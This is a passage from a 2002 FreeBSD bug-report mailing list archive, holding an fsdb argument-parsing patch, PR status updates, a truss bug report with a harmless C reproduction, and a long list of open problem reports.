1, 1, FL_RO, back }, { "active", "Print active inode", 1, 1, FL_RO, active }, { "print", "Print active inode", 1, 1, FL_RO, active }, @@ -160,11 +160,11 @@ { "downlink", "Decrement link count", 1, 1, FL_WR, downlink }, { "linkcount", "Set link count to COUNT", 2, 2, FL_WR, linkcount }, { "ls", "List current inode as directory", 1, 1, FL_RO, ls }, - { "rm", "Remove NAME from current inode directory", 2, 2, FL_WR, rm }, - { "del", "Remove NAME from current inode directory", 2, 2, FL_WR, rm }, - { "ln", "Hardlink INO into current inode directory as NAME", 3, 3, FL_WR, ln }, + { "rm", "Remove NAME from current inode directory", 2, 2, FL_WR | FL_ST, rm }, + { "del", "Remove NAME from current inode directory", 2, 2, FL_WR | FL_ST, rm }, + { "ln", "Hardlink INO into current inode directory as NAME", 3, 3, FL_WR | FL_ST, ln }, { "chinum", "Change dir entry number INDEX to INUM", 3, 3, FL_WR, chinum }, - { "chname", "Change dir entry number INDEX to NAME", 3, 3, FL_WR, chname }, + { "chname", "Change dir entry number INDEX to NAME", 3, 3, FL_WR | FL_ST, chname }, { "chtype", "Change type of current inode to TYPE", 2, 2, FL_WR, newtype }, { "chmod", "Change mode of current inode to MODE", 2, 2, FL_WR, chmode }, { "chlen", "Change length of current inode to LENGTH", 2, 2, FL_WR, chlen }, @@ -187,11 +187,11 @@ struct cmdtable *cmdtp; printf("Commands are:\n%-10s %5s %5s %s\n", - "command", "min argc", "max argc", "what"); + "command", "min args", "max args", "what"); for (cmdtp = cmds; cmdtp->cmd; cmdtp++) printf("%-10s %5u %5u %s\n", - cmdtp->cmd, cmdtp->minargc, cmdtp->maxargc, cmdtp->helptxt); + cmdtp->cmd, cmdtp->minargc-1, cmdtp->maxargc-1, cmdtp->helptxt); return 0; } @@ -254,7 +254,8 @@ else if (cmd_argc >= cmdp->minargc && cmd_argc <= cmdp->maxargc) rval = (*cmdp->handler)(cmd_argc, cmd_argv); - else if (cmd_argc >= cmdp->minargc) { + else if (cmd_argc >= cmdp->minargc && + (cmdp->flags & FL_ST) == FL_ST) { strcpy(line, elline); cmd_argv = recrack(line, &cmd_argc, cmdp->maxargc); rval = (*cmdp->handler)(cmd_argc, cmd_argv); Index: sbin/fsdb/fsdb.h =================================================================== RCS file: /cvs/src/sbin/fsdb/fsdb.h,v retrieving revision 1.7 diff -u -r1.7 fsdb.h --- sbin/fsdb/fsdb.h 21 Mar 2002 13:10:52 -0000 1.7 +++ sbin/fsdb/fsdb.h 15 Apr 2002 10:54:25 -0000 @@ -48,6 +48,7 @@ unsigned int flags; #define FL_RO 0x0000 /* for symmetry */ #define FL_WR 0x0001 /* wants to write */ +#define FL_ST 0x0002 /* resplit final string if argc > maxargc */ int (*handler)(int argc, char *argv[]); }; extern struct dinode *curinode; Index: sbin/fsdb/fsdbutil.c =================================================================== RCS file: /cvs/src/sbin/fsdb/fsdbutil.c,v retrieving revision 1.16 diff -u -r1.16 fsdbutil.c --- sbin/fsdb/fsdbutil.c 21 Mar 2002 13:10:52 -0000 1.16 +++ sbin/fsdb/fsdbutil.c 15 Apr 2002 11:48:34 -0000 @@ -96,7 +96,7 @@ { if (cmdp->minargc == cmdp->maxargc) warnx("command `%s' takes %u arguments, got %u", cmdp->cmd, - cmdp->minargc-1, argc); + cmdp->minargc-1, argc-1); else warnx("command `%s' takes from %u to %u arguments", cmdp->cmd, cmdp->minargc-1, cmdp->maxargc-1); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 6:30: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DEEB737B405 for ; Mon, 15 Apr 2002 06:30:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FDU1m38090; Mon, 15 Apr 2002 06:30:01 -0700 (PDT) (envelope-from gnats) Date: Mon, 15 Apr 2002 06:30:01 -0700 (PDT) Message-Id: <200204151330.g3FDU1m38090@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Matthias Andree Subject: Re: kern/36549: sym driver fails on Tekram DC-390U in 486 machine Reply-To: Matthias Andree Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/36549; it has been noted by GNATS. From: Matthias Andree To: =?iso-8859-15?Q?G=E9rard?= Roudier Cc: Matthias Andree , freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/36549: sym driver fails on Tekram DC-390U in 486 machine Date: Mon, 15 Apr 2002 15:23:22 +0200 The sad thing is, I can no longer reproduce this. I'm getting this instead: sym0: <875> port 0xfc00-0xfcff mem 0xffbea000-0xffbeafff,0xffbebf00-0xffbebfff irq 11 at device 14.0 on pci0 sym0: Tekram NVRAM, ID 7, Fast-20, SE, parity checking sym0: open drain IRQ line driver, using on-chip SRAM sym0: using LOAD/STORE-based firmware. pci0: (vendor=0x102b, dev= 0x051b) at 15.0 irq 9 pcib1: at device 16.0 on pci0 ... ad0: 9671MB [19650/16/63] at ata0-master BIOSPIO Waiting 2 seconds for SCSI devices to settle (noperiph:sym0:0:-1:-1): SCSI BUS reset delivered. (probe2:sym0:0:2:0): INQUIRY. CDB: 12 1 80 0 ff 0 (probe2:sym0:0:2:0): ILLEGAL REQUEST asc:24,0 (probe2:sym0:0:2:0): Invalid field in CDB Creating DISK cd0 pass0 at sym0 bus 0 target 2 lun 0 pass0: Removable CD-ROM SCSI-2 device pass0: 10.000MB/s transfers (10.000MHz, offset 15) I did upgrade the kernel to 4.5-RELEASE-p2 and change its configuration, I can send the diffs of the kernels if so desired. Most important changes: * drop cpu I686_CPU and cpu I386_CPU * drop device ncr (keeping sym) * change SCSI_DELAY=2000 (maybe the Plextor is not ready at the time it is queried, Plextor drives don't boot from CD with Tekram unless the reset->inquiry delay is >= 5 sec -- default 3 sec) * drop tons of other devices To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 7:44: 2 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4806737B404; Mon, 15 Apr 2002 07:44:00 -0700 (PDT) Received: (from roberto@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FEi0L65406; Mon, 15 Apr 2002 07:44:00 -0700 (PDT) (envelope-from roberto) Date: Mon, 15 Apr 2002 07:44:00 -0700 (PDT) From: Message-Id: <200204151444.g3FEi0L65406@freefall.freebsd.org> To: thomas@cuivre.fr.eu.org, roberto@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/35408: es137x.c warning causes buildkernel failure [patch] Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: es137x.c warning causes buildkernel failure [patch] State-Changed-From-To: open->closed State-Changed-By: roberto State-Changed-When: Mon Apr 15 07:43:39 PDT 2002 State-Changed-Why: Patch applied, thanks! http://www.freebsd.org/cgi/query-pr.cgi?pr=35408 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 8: 8:48 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B675D37B400; Mon, 15 Apr 2002 08:08:44 -0700 (PDT) Received: (from ache@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FF8iE73358; Mon, 15 Apr 2002 08:08:44 -0700 (PDT) (envelope-from ache) Date: Mon, 15 Apr 2002 08:08:44 -0700 (PDT) From: Message-Id: <200204151508.g3FF8iE73358@freefall.freebsd.org> To: dimas@dataart.com, ache@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/34935: New locale (Cyrillic Windows Codepage 1251) for FreeBSD Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: New locale (Cyrillic Windows Codepage 1251) for FreeBSD State-Changed-From-To: open->feedback State-Changed-By: ache State-Changed-When: Mon Apr 15 08:04:07 PDT 2002 State-Changed-Why: This variant is wrong in every its piece. Reasons are: Incorrect map and colldef data copied from KOI8-R instead of reflecting CP1251 characters. Moreover, we already have CP1251 map. No monetdef, numericdef, msgdef Incomplete mklocale table. We already have the right table. LC_CTIME have comments stripped and out of the right format http://www.freebsd.org/cgi/query-pr.cgi?pr=34935 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 8:51: 3 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8CD7D37B404; Mon, 15 Apr 2002 08:50:57 -0700 (PDT) Received: (from greid@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FFovD81220; Mon, 15 Apr 2002 08:50:57 -0700 (PDT) (envelope-from greid) Date: Mon, 15 Apr 2002 08:50:57 -0700 (PDT) From: Message-Id: <200204151550.g3FFovD81220@freefall.freebsd.org> To: jwk@stack.nl, greid@FreeBSD.org, freebsd-bugs@FreeBSD.org, greid@FreeBSD.org Subject: Re: bin/36141: sh dumps core Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sh dumps core State-Changed-From-To: open->patched State-Changed-By: greid State-Changed-When: Mon Apr 15 08:49:37 PDT 2002 State-Changed-Why: Fixed in r1.17 (current) Responsible-Changed-From-To: freebsd-bugs->greid Responsible-Changed-By: greid Responsible-Changed-When: Mon Apr 15 08:49:37 PDT 2002 Responsible-Changed-Why: I'll MFC the fix. http://www.freebsd.org/cgi/query-pr.cgi?pr=36141 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 10:28:52 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D155E37B496; Mon, 15 Apr 2002 10:28:32 -0700 (PDT) Received: (from roam@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FHSWl11035; Mon, 15 Apr 2002 10:28:32 -0700 (PDT) (envelope-from roam) Date: Mon, 15 Apr 2002 10:28:32 -0700 (PDT) From: Message-Id: <200204151728.g3FHSWl11035@freefall.freebsd.org> To: ceri@FreeBSD.org, roam@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/36992: battlestar segfaults Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: battlestar segfaults State-Changed-From-To: open->patched State-Changed-By: roam State-Changed-When: Mon Apr 15 10:27:59 PDT 2002 State-Changed-Why: Committed to -current, MFC in two weeks' time. http://www.freebsd.org/cgi/query-pr.cgi?pr=36992 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 11: 0:14 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2815437B400 for ; Mon, 15 Apr 2002 11:00:10 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FI09o16431 for freebsd-bugs@freebsd.org; Mon, 15 Apr 2002 11:00:09 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 15 Apr 2002 11:00:09 -0700 (PDT) Message-Id: <200204151800.g3FI09o16431@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: open PR's (mis)filed to gnats-admin and in limbo Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [2002/04/12] pending/37017gnats-adminRe: textproc/py-asv: remove PYTHON_VERSIO 1 problem total. Non-critical problems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 11: 0:40 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CAD1037B416 for ; Mon, 15 Apr 2002 11:00:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FI04F16391; Mon, 15 Apr 2002 11:00:04 -0700 (PDT) (envelope-from gnats) Received: from infres.enst.fr (infres-192.enst.fr [137.194.192.1]) by hub.freebsd.org (Postfix) with ESMTP id E3D9A37B41B for ; Mon, 15 Apr 2002 10:50:17 -0700 (PDT) Received: from shalmaneser.enst.fr (shalmaneser.enst.fr [137.194.162.11]) by infres.enst.fr (Postfix) with ESMTP id 9267F18F4 for ; Mon, 15 Apr 2002 19:50:16 +0200 (MEST) Received: by shalmaneser.enst.fr (Postfix, from userid 11117) id 0958C1158A; Mon, 15 Apr 2002 19:50:15 +0200 (CEST) Message-Id: <20020415175015.0958C1158A@shalmaneser.enst.fr> Date: Mon, 15 Apr 2002 19:50:15 +0200 (CEST) From: Thomas Quinot Reply-To: Thomas Quinot To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/37104: truss(1) does not print strings from stack correctly Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37104 >Category: bin >Synopsis: truss(1) does not print strings from stack correctly >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Apr 15 11:00:04 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Thomas Quinot >Release: FreeBSD 5.0-CURRENT i386 >Organization: >Environment: System: FreeBSD shalmaneser.enst.fr 5.0-CURRENT FreeBSD 5.0-CURRENT #14: Mon Apr 15 16:33:07 CEST 2002 quinot@shalmaneser.enst.fr:/usr/obj/usr/src/sys/SHALMANESER i386 >Description: When the first argument of open(2) is a pointer to a string on the stack, its value is not correctly printed. This might also impact other system calls that take string arguments. >How-To-Repeat: cat > titi.c <<__EOF__ #include main() { char buf[256] = "/dev/null"; close (open ("/dev/null", O_RDONLY)); close (open (buf, O_RDONLY)); close (open ("/dev/null", O_RDONLY)); } __EOF__ $ gcc -o titi titi.c $ truss -o log ./titi $ grep open log open("/var/run/ld-elf.so.hints",0x0,03) = 4 (0x4) open("/usr/lib/libc.so.5",0x0,027757770344) = 4 (0x4) open("/dev/null",0x0,01001103120) = 4 (0x4) open("",0x0,01001103160) = 4 (0x4) open("/dev/null",0x0,01001103222) = 4 (0x4) Note that the argument reported for the second from last call to open is wrong. Another demonstration of the problem can be produced by setting LANG to a non-null value and trussing a binary that makes a call to setlocale, eg: "LANG=foo truss /bin/ls 2>&1 | grep open". This will output garbage. >Fix: None known so far. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 11: 7:29 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0491B37B41D for ; Mon, 15 Apr 2002 11:00:34 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FI0AQ16437 for freebsd-bugs@freebsd.org; Mon, 15 Apr 2002 11:00:10 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 15 Apr 2002 11:00:10 -0700 (PDT) Message-Id: <200204151800.g3FI0AQ16437@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- f [1998/05/13] kern/6630 phk [PATCH] Fix for Cyrix I8254 bug o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/11/25] kern/8861 mdodd under heavy (multi interface) traffic ep0 f [1999/02/20] kern/10172 [panics] Kernel (esp kern/sys_pipe.c) die o [1999/05/31] kern/11966 ru TCP copies send and receive socket buffer s [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch f [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/07/13] alpha/12623 alpha Certain valid numeric strings cause a SIG o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C f [1999/09/12] kern/13709 panic: sched_sync: fsync failed f [1999/12/05] kern/15281 Please fix handling Ross(?) host to PCI b o [2000/01/17] misc/16157 green "fire" screensave kills network performan o [2000/02/14] kern/16708 wpaul 3Com 3c900-Combo Ehternet card make kerne o [2000/02/18] i386/16802 An user math program have the system on K o [2000/03/15] i386/17391 jhb FreeBSD boot loader does not recognize ke o [2000/03/27] kern/17620 jhay Digi/570i sync driver (if_ar.c) causes sy f [2000/03/28] alpha/17642 alpha FreeBSD/alpha 4.0 RELEASE installation fa o [2000/05/09] misc/18466 dillon install via nfs or ftp media silently tru s [2000/05/17] misc/18641 paul FreeBSD V4.0 crashes when using ifconfig f [2000/05/29] kern/18874 peter 32bit NFS servers export wrong negative v o [2000/06/13] kern/19247 jasone uthread_sigaction.c does not do anything o [2000/06/14] misc/19257 Detection of connected ports on a Cyclom o [2000/07/12] gnu/19882 obrien ld does not detect all undefined symbols! o [2000/07/30] i386/20308 yokota vidcontrol VESA_800x600 causes a kernel p f [2000/07/31] kern/20310 groudier Symbios 53c875j drivers don't work o [2000/08/03] kern/20375 APM doesn't work properly! Suspend/resum o [2000/08/05] kern/20429 yokota setting flags 0x1 in atkbd0 locks keyboar o [2000/08/08] i386/20495 yokota 4.1-STABLE and 4.1-RELEASE: keyboard does o [2000/08/28] kern/20895 groudier sym driver doesn't work for SYM53C895A o [2000/09/04] misc/21025 msmith BTX loader 1.00 gets 1Gb of memory from B f [2000/09/04] i386/21042 mdodd Keyboard driver problems with PS/2 Model o [2000/09/12] kern/21220 msmith mlx0: I/O error - attempt to write beyond o [2000/09/14] kern/21272 wpaul USB interrupts seem to be turned off o [2000/09/14] kern/21278 gibbs ahc driver wedges on stressed SMP system o [2000/09/17] kern/21323 msmith Lock up at boot on Acer507DX with pci.c 1 f [2000/09/19] kern/21397 joerg Floppy drive doesn't work on Compaq ProLi f [2000/10/05] i386/21772 No interrupts for 39160 PCI adapter in PR o [2000/11/01] kern/22494 wpaul Fatal trap 12: page fault while in kernel f [2000/11/02] kern/22557 fatal kernel trap 0x2(memory management) f [2000/11/03] bin/22595 brian telnetd tricked into using arbitrary peer o [2000/11/18] kern/22953 keu driver throws 'usb error on rx: IOERR o [2000/11/20] gnu/22972 obrien Internal Compiler Error o [2000/11/25] misc/23103 lacks many ISO C99 features (NAN f [2000/11/27] i386/23145 brian pppoe-test-program panics the server o [2000/11/29] kern/23173 read hangs in linux emulation f [2000/12/09] kern/23411 SMP Kernel Freezes Machines on Dual Proce a [2000/12/14] kern/23547 msmith only one logical device on Mylex AcceleRA f [2000/12/14] i386/23548 4.x causes Thinkpad 560X disk to spin up/ o [2001/01/17] kern/24418 jasone read/write in thread library (-lc_r) does f [2001/01/30] kern/24740 cy filesystem corruption CFP1080 CAM SCSI ca a [2001/02/02] kern/24811 Networking in FreeBSD 4.2-RELEASE doesn't f [2001/02/20] kern/25235 OS Hungs up when using with a Battery of f [2001/02/23] i386/25328 4.x stable kernel crash: page fault f [2001/02/27] misc/25407 Error while booting 4.2 : ahc0 Signaled A o [2001/03/09] kern/25632 n_hibma USB modem (umodem) may destroy the cfreel o [2001/03/20] kern/25950 obrien Bad drives on asr look zero-length and pa o [2001/03/24] kern/26048 obrien 4.3-RC: SMP and asr driver don't work to f [2001/03/30] kern/26223 Linux /compat/linux/dev devices doesn't w f [2001/03/30] kern/26224 dillon VFS Panic/SMP/CFLOW(HEAVY network)/Heavy o [2001/04/02] bin/26305 mjacob Cannnot restore partions with FreeBSD 4.x f [2001/04/12] kern/26510 kernel panic while booting on Intel STL2 o [2001/04/13] kern/26549 IPsec policies for more than one pair of f [2001/04/20] i386/26736 System freeze booting from (i386) 4.3 flo f [2001/04/25] kern/26840 dillon process doing mmap() over nfs hangs in vm o [2001/05/02] ports/27036 sobomax All Ports using Mesa3 are required with - f [2001/05/02] i386/27042 4.3-RELEASE installation from CDROM fails f [2001/05/02] kern/27048 Bus support (I believe) broken in freeBSD f [2001/05/03] kern/27059 groudier (symbios) SCSI subsystem hangs under heav a [2001/05/10] kern/27250 bp unionfs filesystem panics in large number o [2001/05/11] kern/27275 kernel bug ? f [2001/05/17] conf/27408 rc.network hangs at rpc.umntall if stale o [2001/06/07] bin/27939 rlogin uses wrong IP address for remote h o [2001/06/08] kern/27985 Recent -STABLE crashes when accessing dc o [2001/06/09] kern/27987 New ATA Driver failure with VIA Southbrid a [2001/06/09] i386/27991 ssh 1 and 2 login with keys is not possib o [2001/06/09] bin/28002 ru SHARED=symlinks is broken f [2001/06/14] kern/28162 RELENG_4 (4.2, 4.3) Panics when system ha f [2001/06/14] kern/28163 in_pcballoc Panic in RELENG_4 with large o [2001/06/25] kern/28402 kernel panic caused by softupdates (may b o [2001/06/25] kern/28418 dwmalone XFree86 4.X panics FreeBSD 4.3-STABLE on o [2001/06/27] kern/28465 Enabling softupdates on a clean but activ o [2001/06/27] kern/28466 When soft updates is enabled, cpl is not o [2001/06/30] i386/28550 Boot: Fatal Trap 12: page fault while in f [2001/06/30] i386/28558 makedev return non-zero status after inst o [2001/07/02] kern/28630 Look like hung up a kernel after few minu f [2001/07/04] kern/28703 dillon Kernel reboot during tape backup of nfs m o [2001/07/05] kern/28751 n_hibma USB Mouse doesn't seem to work! o [2001/07/14] kern/28966 pirzyk math libraries in linux emulation do not o [2001/07/14] kern/28974 PPPoE software fails when SOCK_RAW employ o [2001/07/15] ports/28995 max deMime produces blank line in header part f [2001/07/17] i386/29045 Heavy disk usage causes panic in ffs_blkf f [2001/07/19] i386/29096 freebsd 4.2/4.3 hangs after probing devic o [2001/07/21] kern/29121 msdos fs causes kernel panic when writing o [2001/07/24] bin/29191 NFS file locking fails from Solaris 8 cli o [2001/07/24] misc/29200 dcs Syntax errors in /boot/device.hints cause f [2001/07/30] ports/29325 ade Dbview contains an error, because of whic o [2001/08/13] ports/29681 portmgr bsd.port.mk cannot handle some module's P o [2001/08/14] conf/29699 Setting NO_MAILWRAPPER results in a syst o [2001/08/15] kern/29741 alfred ptrace(pid);ptrace(ppid) makes pid and pp o [2001/08/15] kern/29742 PCCARD Modems don't work on cardbus bridg o [2001/08/15] kern/29743 TI-1450 interrupt storm o [2001/08/18] kern/29844 setpgrp does not behave as manual says o [2001/08/18] kern/29847 n_hibma USB usbd_probe_and_attach() is broken and o [2001/09/03] ports/30292 kde QT/KDE 1.x needs to be removed o [2001/09/03] kern/30300 -current hang caught and crash-dump'd. o [2001/09/04] ports/30331 portmgr Conflict between bsd.port.mk MAKEFILE var o [2001/09/09] i386/30458 Workstation sometimes hangs when connecte f [2001/09/12] i386/30527 does not like scsi on atrend 6260 dual PI o [2001/09/19] i386/30670 4.3 and 4.4 mfsroot floppies reboot Dell o [2001/09/20] i386/30693 On new install bootup does endless usb0: f [2001/09/21] i386/30705 msmith Installation fails on system with Mylex A o [2001/09/23] kern/30771 Panic when mounting drive a [2001/09/24] i386/30802 gibbs repeat of i386/22760. Adaptec SCSI contro o [2001/09/27] bin/30869 dump does not dump all files of a filesys o [2001/09/28] i386/30898 Inspiron 8100 keyboard unusable off mains o [2001/09/29] kern/30921 ACER mechanic ps/2 keyboard don´t work an o [2001/09/30] ports/30935 taoka pips sc880 - needs to have syvr4 support o [2001/10/01] i386/30961 On lsdev -> error & BTX halted =( o [2001/10/04] kern/31042 murray Device name conflict o [2001/10/12] kern/31233 Kernel panics after upgrading to 4.4-STAB o [2001/10/13] ports/31254 obrien I cannot compile Java src files using gcj o [2001/10/14] misc/31266 System can be crashed with "ls -al /flopp o [2001/10/15] bin/31304 joe fix crunchgen to work with more contrib-k o [2001/10/17] conf/31327 Fixes and improvements for rc.diskless* s o [2001/10/24] kern/31468 Spontaneous crashes, possible related to o [2001/10/25] kern/31493 BTX halted with big disk and 4.4R f [2001/10/31] i386/31671 4.4 installer hangs at " Mounting root fr o [2001/11/02] kern/31710 kernel reboots; looks like an unintended o [2001/11/03] i386/31728 Install hangs on: (debug screens last wri o [2001/11/12] ports/31948 steve open-motif: having USE_MOTIF in /etc/make o [2001/11/16] bin/32040 brian 4.4-Release "set mtu" in ppp is broken wi f [2001/11/20] i386/32127 Proliant 1600 kernel panics after SMP is o [2001/11/22] kern/32184 Kernel crashes in ufs code o [2001/11/23] i386/32237 4.4-RELEASE keyboard doesnt work after bo f [2001/11/30] kern/32418 silby kernel table full o [2001/12/04] ports/32506 des Apache mod_auth_pam doesn't works o [2001/12/07] conf/32583 jkh System becomes unusable after performing o [2001/12/09] ports/32664 obrien open-motif-devel-2.1.30 registers itself o [2001/12/11] kern/32713 usb mouse detaches from hub and doesnt re o [2001/12/11] ports/32714 kde KDE build failure: Qt's uic core dumps o [2001/12/12] alpha/32757 alpha fatal kernel trap using generic kernel fo o [2001/12/14] i386/32830 FreeBSD 4.4 install fails on Thinkpad 750 a [2001/12/14] kern/32831 sos HP Colorado IDE tape drive get wedged eas o [2001/12/16] bin/32895 imp rebooting between Win98SE and 4.4-2001121 a [2001/12/22] i386/33089 murray GENERIC bloat causes 'make world' to brea o [2001/12/25] misc/33169 system freeze after cron daily security c o [2001/12/27] misc/33261 dwmalone FreeBSD base system does not install tcpd o [2001/12/27] gnu/33262 mp gdb does not handle pending signals corre f [2001/12/30] conf/33345 pnpinfo not finding info for pnp pci mode f [2002/01/04] i386/33525 root access without password f [2002/01/04] misc/33567 RELENG_4 won't makeworld; bsd.dep.mk, Mak o [2002/01/05] i386/33574 kernel hangs on page fault during boot pr f [2002/01/07] kern/33637 dillon Panic: vm_page_unwire: invalid wire count o [2002/01/07] bin/33670 dwmalone default inetd install allows for unlimite f [2002/01/08] misc/33688 Downloading some files with ftp hangs the o [2002/01/14] ports/33887 kris security/snort port cannot find its rule o [2002/01/16] kern/33951 pthread_cancel is ignored o [2002/01/16] kern/33952 Bogus error message from correct phreads o [2002/01/16] kern/33970 random freeze on IDE Raid 0 (Highpoint HP o [2002/01/17] misc/33997 Reboot Fails on Server o [2002/01/17] i386/34018 response to request from ipv6 client does o [2002/01/18] bin/34028 brian userland ppp o [2002/01/18] i386/34051 Install menu crashes o [2002/01/19] kern/34067 n_hibma Reproducable crash on usb ugen o [2002/01/19] kern/34071 pcn-driver is sort-of-broken in 4.5RC2 (a a [2002/01/21] ports/34123 mharo sudo coredumps on ^C in password prompt & o [2002/01/21] i386/34144 installation,mounting root from ufs:/dev/ o [2002/01/25] bin/34274 green 4.5-RC Interoperability issue: sshd o [2002/01/27] ports/34357 portmgr ports needs a resume function. o [2002/01/29] ports/34433 obrien devel/gdb51 port doesn't build f [2002/01/30] kern/34447 DLink DFE 500 rev E1 + dhclient dc0 crash o [2002/01/30] kern/34470 bde Modem gets sio1 interrupt-level buffer o o [2002/01/31] bin/34502 ssh can crash the 4.5 system o [2002/02/03] i386/34576 cannot load freebsd o [2002/02/06] ports/34669 www "download" links in WWW ports listing are f [2002/02/06] misc/34675 iedowse Restore asking for another volume - on la o [2002/02/06] kern/34680 Kernel panics when checking-out a tree (d o [2002/02/07] kern/34711 frequent system stall under moderate scsi f [2002/02/11] kern/34830 frequent panic . 4.3-STABLE o [2002/02/15] i386/34977 IPFW UID/GID Based Filtering doesn't work o 